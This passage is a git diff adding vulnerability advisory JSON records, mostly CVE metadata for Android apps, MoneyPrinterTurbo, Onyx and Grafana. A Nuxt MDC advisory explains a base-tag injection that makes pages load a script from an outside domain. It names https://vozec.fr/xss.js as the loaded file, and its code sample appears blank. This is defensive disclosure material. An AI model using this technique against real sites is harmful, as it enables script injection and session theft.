respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7891" + }, + { + "type": "WEB", + "url": "https://github.com/KMov-g/androidapps/blob/main/com.instantbits.cast.webvideo.md" + }, + { + "type": "WEB", + "url": "https://github.com/KMov-g/androidapps/blob/main/com.instantbits.cast.webvideo.md#steps-to-reproduce" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317006" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317006" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.615271" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-926" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T13:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-4qpq-7frv-mpfw/GHSA-4qpq-7frv-mpfw.json b/advisories/unreviewed/2025/07/GHSA-4qpq-7frv-mpfw/GHSA-4qpq-7frv-mpfw.json new file mode 100644 index 0000000000000..de870398a12a4 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4qpq-7frv-mpfw/GHSA-4qpq-7frv-mpfw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4qpq-7frv-mpfw", + "modified": "2025-07-20T15:30:27Z", + "published": "2025-07-20T15:30:27Z", + "aliases": [ + "CVE-2025-46382" + ], + "details": "CWE-200 Exposure of Sensitive Information to an Unauthorized Actor", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46382" + }, + { + "type": "WEB", + "url": "https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T15:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-656m-7xwx-9vrp/GHSA-656m-7xwx-9vrp.json b/advisories/unreviewed/2025/07/GHSA-656m-7xwx-9vrp/GHSA-656m-7xwx-9vrp.json new file mode 100644 index 0000000000000..1fcbadd70d4a5 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-656m-7xwx-9vrp/GHSA-656m-7xwx-9vrp.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-656m-7xwx-9vrp", + "modified": "2025-07-20T15:30:27Z", + "published": "2025-07-20T15:30:27Z", + "aliases": [ + "CVE-2025-7894" + ], + "details": "A vulnerability, which was classified as critical, has been found in Onyx up to 0.29.1. This issue affects the function generate_simple_sql of the file backend/onyx/agents/agent_search/kb_search/nodes/a3_generate_simple_sql.py of the component Chat Interface. The manipulation leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7894" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317009" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317009" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.615322" + }, + { + "type": "WEB", + "url": "https://www.cnblogs.com/aibot/p/18982747" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T14:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-89p2-5qg7-rj57/GHSA-89p2-5qg7-rj57.json b/advisories/unreviewed/2025/07/GHSA-89p2-5qg7-rj57/GHSA-89p2-5qg7-rj57.json new file mode 100644 index 0000000000000..dcb188bd54c56 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-89p2-5qg7-rj57/GHSA-89p2-5qg7-rj57.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-89p2-5qg7-rj57", + "modified": "2025-07-20T15:30:28Z", + "published": "2025-07-20T15:30:28Z", + "aliases": [ + "CVE-2025-46385" + ], + "details": "CWE-918 Server-Side Request Forgery (SSRF)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46385" + }, + { + "type": "WEB", + "url": "https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T15:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-cmv4-w733-w8cj/GHSA-cmv4-w733-w8cj.json b/advisories/unreviewed/2025/07/GHSA-cmv4-w733-w8cj/GHSA-cmv4-w733-w8cj.json new file mode 100644 index 0000000000000..c91e1aa30622e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-cmv4-w733-w8cj/GHSA-cmv4-w733-w8cj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cmv4-w733-w8cj", + "modified": "2025-07-20T15:30:27Z", + "published": "2025-07-20T15:30:27Z", + "aliases": [ + "CVE-2025-46383" + ], + "details": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46383" + }, + { + "type": "WEB", + "url": "https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T15:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-frjw-rj7c-pv43/GHSA-frjw-rj7c-pv43.json b/advisories/unreviewed/2025/07/GHSA-frjw-rj7c-pv43/GHSA-frjw-rj7c-pv43.json new file mode 100644 index 0000000000000..5c184930f1f8c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-frjw-rj7c-pv43/GHSA-frjw-rj7c-pv43.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-frjw-rj7c-pv43", + "modified": "2025-07-20T15:30:27Z", + "published": "2025-07-20T15:30:27Z", + "aliases": [ + "CVE-2025-7893" + ], + "details": "A vulnerability classified as problematic was found in Foresight News App up to 2.6.4 on Android. This vulnerability affects unknown code of the file AndroidManifest.xml of the component pro.foresightnews.appa. The manipulation leads to improper export of android application components. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7893" + }, + { + "type": "WEB", + "url": "https://github.com/KMov-g/androidapps/blob/main/pro.foresightnews.app.md" + }, + { + "type": "WEB", + "url": "https://github.com/KMov-g/androidapps/blob/main/pro.foresightnews.app.md#steps-to-reproduce" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317008" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317008" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.615292" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-926" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T14:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-h842-f758-5xgc/GHSA-h842-f758-5xgc.json b/advisories/unreviewed/2025/07/GHSA-h842-f758-5xgc/GHSA-h842-f758-5xgc.json new file mode 100644 index 0000000000000..359dcc4102fe6 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-h842-f758-5xgc/GHSA-h842-f758-5xgc.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h842-f758-5xgc", + "modified": "2025-07-20T15:30:28Z", + "published": "2025-07-20T15:30:28Z", + "aliases": [ + "CVE-2025-7897" + ], + "details": "A vulnerability was found in harry0703 MoneyPrinterTurbo up to 1.2.6 and classified as critical. Affected by this issue is the function verify_token of the file app/controllers/base.py of the component API Endpoint. The manipulation leads to missing authentication. The attack may be launched remotely.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7897" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317012" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317012" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.609040" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T15:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-hv33-w2jr-7q49/GHSA-hv33-w2jr-7q49.json b/advisories/unreviewed/2025/07/GHSA-hv33-w2jr-7q49/GHSA-hv33-w2jr-7q49.json new file mode 100644 index 0000000000000..6ad42f78675d5 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-hv33-w2jr-7q49/GHSA-hv33-w2jr-7q49.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hv33-w2jr-7q49", + "modified": "2025-07-20T15:30:27Z", + "published": "2025-07-20T15:30:27Z", + "aliases": [ + "CVE-2025-7892" + ], + "details": "A vulnerability classified as problematic has been found in IDnow App up to 9.6.0 on Android. This affects an unknown part of the file AndroidManifest.xml of the component de.idnow. The manipulation leads to improper export of android application components. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7892" + }, + { + "type": "WEB", + "url": "https://github.com/KMov-g/androidapps/blob/main/de.idnow.md" + }, + { + "type": "WEB", + "url": "https://github.com/KMov-g/androidapps/blob/main/de.idnow.md#steps-to-reproduce" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317007" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317007" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.615279" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-926" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T14:15:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-jc76-cg2q-pp7h/GHSA-jc76-cg2q-pp7h.json b/advisories/unreviewed/2025/07/GHSA-jc76-cg2q-pp7h/GHSA-jc76-cg2q-pp7h.json new file mode 100644 index 0000000000000..385acd8dde964 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-jc76-cg2q-pp7h/GHSA-jc76-cg2q-pp7h.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jc76-cg2q-pp7h", + "modified": "2025-07-20T15:30:28Z", + "published": "2025-07-20T15:30:28Z", + "aliases": [ + "CVE-2025-46384" + ], + "details": "CWE-434 Unrestricted Upload of File with Dangerous Type", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46384" + }, + { + "type": "WEB", + "url": "https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T15:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-ph47-hpx7-mghq/GHSA-ph47-hpx7-mghq.json b/advisories/unreviewed/2025/07/GHSA-ph47-hpx7-mghq/GHSA-ph47-hpx7-mghq.json new file mode 100644 index 0000000000000..c4a26c76cf506 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-ph47-hpx7-mghq/GHSA-ph47-hpx7-mghq.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ph47-hpx7-mghq", + "modified": "2025-07-20T15:30:27Z", + "published": "2025-07-20T15:30:27Z", + "aliases": [ + "CVE-2025-7889" + ], + "details": "A vulnerability was found in CallApp Caller ID App up to 2.0.4 on Android. It has been classified as problematic. Affected is an unknown function of the file AndroidManifest.xml of the component caller.id.phone.number.block. The manipulation leads to improper export of android application components. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7889" + }, + { + "type": "WEB", + "url": "https://github.com/KMov-g/androidapps/blob/main/caller.id.phone.number.block.md" + }, + { + "type": "WEB", + "url": "https://github.com/KMov-g/androidapps/blob/main/caller.id.phone.number.block.md#steps-to-reproduce" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317004" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317004" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.615250" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-926" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T13:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q6m4-vcrr-c6mx/GHSA-q6m4-vcrr-c6mx.json b/advisories/unreviewed/2025/07/GHSA-q6m4-vcrr-c6mx/GHSA-q6m4-vcrr-c6mx.json new file mode 100644 index 0000000000000..713413a6cf33c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q6m4-vcrr-c6mx/GHSA-q6m4-vcrr-c6mx.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6m4-vcrr-c6mx", + "modified": "2025-07-20T15:30:28Z", + "published": "2025-07-20T15:30:28Z", + "aliases": [ + "CVE-2025-7896" + ], + "details": "A vulnerability has been found in harry0703 MoneyPrinterTurbo up to 1.2.6 and classified as critical. Affected by this vulnerability is the function download_video/delete_video of the file app/controllers/v1/video.py. The manipulation leads to path traversal. The attack can be launched remotely.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7896" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317011" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317011" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.608941" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.609041" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T15:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-vj32-5645-8hm6/GHSA-vj32-5645-8hm6.json b/advisories/unreviewed/2025/07/GHSA-vj32-5645-8hm6/GHSA-vj32-5645-8hm6.json new file mode 100644 index 0000000000000..097b8641208ec --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-vj32-5645-8hm6/GHSA-vj32-5645-8hm6.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vj32-5645-8hm6", + "modified": "2025-07-20T15:30:27Z", + "published": "2025-07-20T15:30:27Z", + "aliases": [ + "CVE-2025-7890" + ], + "details": "A vulnerability was found in Dunamu StockPlus App up to 7.62.10 on Android. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file AndroidManifest.xml of the component com.dunamu.stockplus. The manipulation leads to improper export of android application components. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7890" + }, + { + "type": "WEB", + "url": "https://github.com/KMov-g/androidapps/blob/main/com.dunamu.stockplus.md" + }, + { + "type": "WEB", + "url": "https://github.com/KMov-g/androidapps/blob/main/com.dunamu.stockplus.md#steps-to-reproduce" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317005" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317005" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.615270" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-926" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T13:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-vj4v-72c4-7jpw/GHSA-vj4v-72c4-7jpw.json b/advisories/unreviewed/2025/07/GHSA-vj4v-72c4-7jpw/GHSA-vj4v-72c4-7jpw.json new file mode 100644 index 0000000000000..3d83c51badac5 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-vj4v-72c4-7jpw/GHSA-vj4v-72c4-7jpw.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vj4v-72c4-7jpw", + "modified": "2025-07-20T15:30:28Z", + "published": "2025-07-20T15:30:28Z", + "aliases": [ + "CVE-2025-7895" + ], + "details": "A vulnerability, which was classified as critical, was found in harry0703 MoneyPrinterTurbo up to 1.2.6. Affected is the function upload_bgm_file of the file app/controllers/v1/video.py of the component File Extension Handler. The manipulation of the argument File leads to unrestricted upload. It is possible to launch the attack remotely.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7895" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317010" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317010" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.608940" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T15:15:24Z" + } +} \ No newline at end of file From 0d38e317515226acffe7955e112a017470be57aa Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 20 Jul 2025 16:37:21 +0000 Subject: [PATCH 037/323] Publish Advisories GHSA-cj6r-rrr9-fg82 GHSA-vqph-p5vc-g644 GHSA-vqph-p5vc-g644 --- .../GHSA-cj6r-rrr9-fg82.json | 65 ++++++++++++++ .../GHSA-vqph-p5vc-g644.json | 85 +++++++++++++++++++ .../GHSA-vqph-p5vc-g644.json | 40 --------- 3 files changed, 150 insertions(+), 40 deletions(-) create mode 100644 advisories/github-reviewed/2025/07/GHSA-cj6r-rrr9-fg82/GHSA-cj6r-rrr9-fg82.json create mode 100644 advisories/github-reviewed/2025/07/GHSA-vqph-p5vc-g644/GHSA-vqph-p5vc-g644.json delete mode 100644 advisories/unreviewed/2025/07/GHSA-vqph-p5vc-g644/GHSA-vqph-p5vc-g644.json diff --git a/advisories/github-reviewed/2025/07/GHSA-cj6r-rrr9-fg82/GHSA-cj6r-rrr9-fg82.json b/advisories/github-reviewed/2025/07/GHSA-cj6r-rrr9-fg82/GHSA-cj6r-rrr9-fg82.json new file mode 100644 index 0000000000000..60e2d92f18078 --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-cj6r-rrr9-fg82/GHSA-cj6r-rrr9-fg82.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cj6r-rrr9-fg82", + "modified": "2025-07-20T16:36:14Z", + "published": "2025-07-20T16:36:14Z", + "aliases": [ + "CVE-2025-54075" + ], + "summary": "Nuxt MDC has an XSS vulnerability in markdown rendering that bypasses HTML filtering", + "details": "### Summary\nA **remote script-inclusion / stored XSS** vulnerability in **@nuxtjs/mdc** lets a Markdown author inject a `` element. \nThe `` tag rewrites how all subsequent relative URLs are resolved, so an attacker can make the page load scripts, styles, or images from an external, attacker-controlled origin and execute arbitrary JavaScript in the site’s context.\n\n### Details\n- **Affected file** : `src/runtime/parser/utils/props.ts` \n- **Core logic**  : `validateProp()` inspects \n * attributes that start with `on` → blocked \n * `href` or `src` → filtered by `isAnchorLinkAllowed()` \n Every other attribute and every **tag** (including ``) is allowed unchanged, so the malicious `href` on `` is never validated.\n\n\n```\nexport const validateProp = (attribute: string, value: string) => {\n if (attribute.startsWith('on')) return false\n if (attribute === 'href' || attribute === 'src') {\n return isAnchorLinkAllowed(value)\n }\n return true // ← “href” on not checked\n}\n```\n\nAs soon as `` is parsed, any later relative path—`/script.js`, `../img.png`, etc.—is fetched from the attacker’s domain.\n\n### Proof of Concept\nPlace the following in any Markdown handled by Nuxt MDC:\n\n\n```\n\n\n```\n\n1. Start the Nuxt app (`npm run dev`). \n2. Visit the page. \n3. The browser requests `https://vozec.fr/xss.js`, and whatever JavaScript it returns runs under the vulnerable site’s origin (unless CSP blocks it).\n\n### Impact\n- **Type**: Stored XSS via remote script inclusion \n- **Affected apps**: Any Nuxt project using **@nuxtjs/mdc** to render user-controlled Markdown (blogs, CMSs, docs, comments…). \n- **Consequences**: Full takeover of visitor sessions, credential theft, defacement, phishing, CSRF, or any action executable via injected scripts.\n\n### Recommendations\n1. **Disallow or sanitize `` tags** in the renderer. The safest fix is to strip them entirely. \n2. Alternatively, restrict `href` on `` to same-origin URLs and refuse protocols like `http:`, `https:`, `data:`, etc. that do not match the current site origin. \n3. Publish a patched release and document the security fix. \n4. Until patched, disable raw HTML in Markdown or use an external sanitizer (e.g., DOMPurify) with `FORBID_TAGS: ['base']`.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@nuxtjs/mdc" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.17.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nuxt-modules/mdc/security/advisories/GHSA-cj6r-rrr9-fg82" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54075" + }, + { + "type": "WEB", + "url": "https://github.com/nuxt-modules/mdc/commit/3657a5bf2326a73cd3d906f57149146a412b962a" + }, + { + "type": "PACKAGE", + "url": "https://github.com/nuxt-modules/mdc" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2025-07-20T16:36:14Z", + "nvd_published_at": "2025-07-18T16:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2025/07/GHSA-vqph-p5vc-g644/GHSA-vqph-p5vc-g644.json b/advisories/github-reviewed/2025/07/GHSA-vqph-p5vc-g644/GHSA-vqph-p5vc-g644.json new file mode 100644 index 0000000000000..32542ea52c0de --- /dev/null +++ b/advisories/github-reviewed/2025/07/GHSA-vqph-p5vc-g644/GHSA-vqph-p5vc-g644.json @@ -0,0 +1,85 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vqph-p5vc-g644", + "modified": "2025-07-20T16:35:49Z", + "published": "2025-07-18T09:30:31Z", + "aliases": [ + "CVE-2025-6023" + ], + "summary": "Grafana is vulnerable to XSS attacks through open redirects and path traversal", + "details": "An open redirect vulnerability has been identified in Grafana OSS that can be exploited to achieve XSS attacks. The vulnerability was introduced in Grafana v11.5.0.\n\nThe open redirect can be chained with path traversal vulnerabilities to achieve XSS.\n\nFixed in versions 12.0.2+security-01, 11.6.3+security-01, 11.5.6+security-01, 11.4.6+security-01 and 11.3.8+security-01", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + 